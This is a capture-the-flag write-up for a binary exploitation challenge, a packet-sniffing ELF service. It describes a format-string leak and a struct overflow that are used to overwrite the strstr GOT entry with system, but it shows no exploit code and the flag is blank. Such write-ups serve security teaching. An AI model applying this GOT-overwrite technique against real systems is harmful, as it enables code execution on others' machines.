This challenge was solved by and the write up was written by one of my teammates, tukan
We were given an x64 ELF binary and the corresponding libc. It had most protections enabled but still had writeable .got entries.
Reversing the challenge revealed that:
the binary sniffs trafic via libpcap.
processes only icmp and tcp/80 traffic.
the icmp handler contains an information leak via a format string bug.
the tcp handler contains a buffer overflow inside the structure allocated for tcp connections, allowing us to modify pointers later used as destination addresses for memcpy calls with attacker-controlled source data.
The relevant parts of the struct:
The exploitation plan is as follows:
leak pointers to libc and the binary from the stack using the format string bug.
overwrite the username pointer in the connection struct with the address of the strstr .got entry.
overwrite the strstr got entry (called on attacker-controlled data in the tcp handler) via the address of system from libc.
read the flag using the the shell command: “. ./flag” (made possible by stderr coming back from the binary)
The flag was:
Exploit
(not stable, you probably have to run multiple times)
This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading